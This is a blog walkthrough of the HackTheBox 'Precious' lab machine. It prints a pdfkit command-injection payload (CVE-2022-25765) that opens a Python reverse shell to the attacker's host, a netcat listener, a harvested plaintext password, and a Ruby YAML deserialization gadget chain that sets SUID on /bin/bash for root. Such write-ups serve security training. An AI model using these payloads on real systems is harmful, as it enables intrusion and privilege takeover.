Home front-page port 80-shoopyu Precious | HackTheBox | Easy
Post
Cancel

front-page port 80-shoopyu Precious | HackTheBox | Easy

Posted Oct 20, 2022
By sujay adkesar
3 min read

precious-htb

HackTheBox / Precious - machine!

Enumeration {nmap}

1

sudo nmap -sV -sC <target-ip>

Result:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

β”Œβ”€β”€(rootγ‰Ώkali)-[/home/local_host/Desktop/machines/precious-HTB]
└─# nmap -sV -sC 10.10.11.189                 
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-10 08:28 EST
Nmap scan report for 10.10.11.189
Host is up (0.51s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 845e13a8e31e20661d235550f63047d2 (RSA)
|   256 a2ef7b9665ce4161c467ee4e96c7c892 (ECDSA)
|_  256 33053dcd7ab798458239e7ae3c91a658 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-title: Did not follow redirect to http://precious.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.86 seconds

Web Reconnaissance

So Let’s first enumerate port 80. The index page looks like this. Page source contains nothing useful.

80-precious

error-1

The web server appears to offer a service that converts web pages into PDF files. Let’s test this functionality out.

1

python3 -m http.server --bind 127.0.0.1 80

Once your server is running, go back to precious.htb and enter the IP address and port number your server is running on, and click submit. As expected, a pdf file should be downloaded to your machine. Mine looks like this:

error2

Let’s check the metadata of this!!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

β”Œβ”€β”€(rootγ‰Ώkali)
|
└─# exiftool 61fs66gu9di2n46jugnn8n21hfgfj4fg.pdf
ExifTool Version Number         : 12.51
File Name                       : 61fs66gu9di2n46jugnn8n21hfgfj4fg.pdf
Directory                       : .
File Size                       : 18 kB
File Modification Date/Time     : 2022:12:10 08:35:39-05:00
File Access Date/Time           : 2022:12:10 08:35:52-05:00
File Inode Change Date/Time     : 2022:12:10 08:35:39-05:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Page Count                      : 1
Creator                         : Generated by pdfkit v0.8.6

What’s interesting to us here is that the file is generated by pdfkit v0.8.6. a PDF document generation library. Doing a quick google search looking for any known vulnerabilities we find CVE-2022–25765

Exploit

Payload

1

http://xx.xx.xx.xx/?name=%20`python3 -c 'import socket,subprocess,os;s=socket.socket(socket.af_inet,socket.sock_stream);s.connect(("10.10.14.21",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'`

Listener

1

nc -lnvp 9001

error-3

Looking around a bit more, we find a file in /home/ruby/.bundle directory called config. Displaying the contents of config reveals the password for user henry

Foothold

As you can see, we managed to log into the server as the user ruby. Navigating to the /home directory, we find two directories. One for our ruby user, and one for a user called henry. Inside henry’s directory we can see a file called user.txt. That’s got to be our first flag. Unfortunately, we can’t access it yet

4

instead we got password for henry’s account Q3c1AqGHtoI0aXAYFH

1

ssh henry@<ip-addr>

Privilege Escalation:

5

It appears that henry can run the file update_depencies.rb as root. Use cat to take a look at the file

6

click here to copy the payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

create a file called dependencies.yml
---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: chmod u+s /bin/bash
         method_id: :resolve

note : Replace the id with chmod u+s /bin/bash

Run the file

1

sudo /usr/bin/ruby /opt/update_dependencies.rb

8

Β  Β 

Congragulations You got the root access!!

USER FLAG 75fb440c0ef7fd22c28f************

ROOT FLAG 6e8dfa9c1c1968383f0c************

Write Up, HackTheBox
pdfkit web http hackthebox ctf easy walkthrough precious
This post is licensed under CC BY 4.0 by the author.
Contents

front-page port 80-shoopyu Simple CTF| Tryhackme | Easy

front-page port 80-shoopyu Shoppy | HackTheBox | Easy